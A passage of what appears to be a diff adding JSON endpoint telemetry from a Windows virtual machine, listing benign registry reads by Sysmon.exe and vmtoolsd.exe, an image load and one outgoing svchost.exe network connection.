"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570917460000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "cldapi.dll", + "image_path": "C:\\Windows\\System32\\cldapi.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570917310016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570918090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570918090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570918090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "destination_address": "151.101.48.133", + "destination_port": "443", + "event_type": "network", + "pid": 3980, + "process_name": "svchost.exe", + "process_path": "C:\\Windows\\System32\\svchost.exe", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50502", + "subtype": "outgoing", + "timestamp": 131883570903820000, + "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}", + "user": "NT AUTHORITY\\SYSTEM", + "user_domain": "NT AUTHORITY", + "user_name": "SYSTEM" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570920590000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed8e22c573\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.Windows.FileExplorer_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed8e22c573\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570920590000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri", + "registry_value": "C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri", + "timestamp": 131883570922619984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97d4ea1b\\a01460c8", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CWindows%5CSystemApps%5CMicrosoft.AAD.BrokerPlugin_cw5n1h2txyewy%5Cresources.pri\\1d3d1ed97d4ea1b\\a01460c8\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570922619984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri", + "timestamp": 131883570923090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri\\1d48b5dcbcf231a\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingFinance_4.26.12334.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-0.pri\\1d48b5dcbcf231a\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570923090000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570923400000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5da1da56ec\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingNews_4.27.2643.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5da1da56ec\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570923400000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570923710000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d8fe5a311\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingSports_4.25.11802.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5d8fe5a311\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570923710000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570924030000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5cb01d6579\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.BingWeather_4.26.12153.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5cb01d6579\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570924030000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri", + "timestamp": 131883570924650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8b754811\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.CommsPhone_3.43.20002.1000_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-2.pri\\1d48b5c8b754811\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570924650000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570925119984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5db8214a55\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.DesktopAppInstaller_1.0.20921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5db8214a55\\fae8ab0e\\LanguageList", + "registry_value": "LanguageList", + "timestamp": 131883570925119984, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri", + "timestamp": 131883570925280000, + "unique_pid": "{42FC7E13-B331-5C05-0000-0010E8480800}" + }, + { + "event_type": "registry", + "pid": 6452, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.GetHelp_10.1706.12921.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-1.pri\\1d48b5c95cbb64f\\fae8ab0e", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram 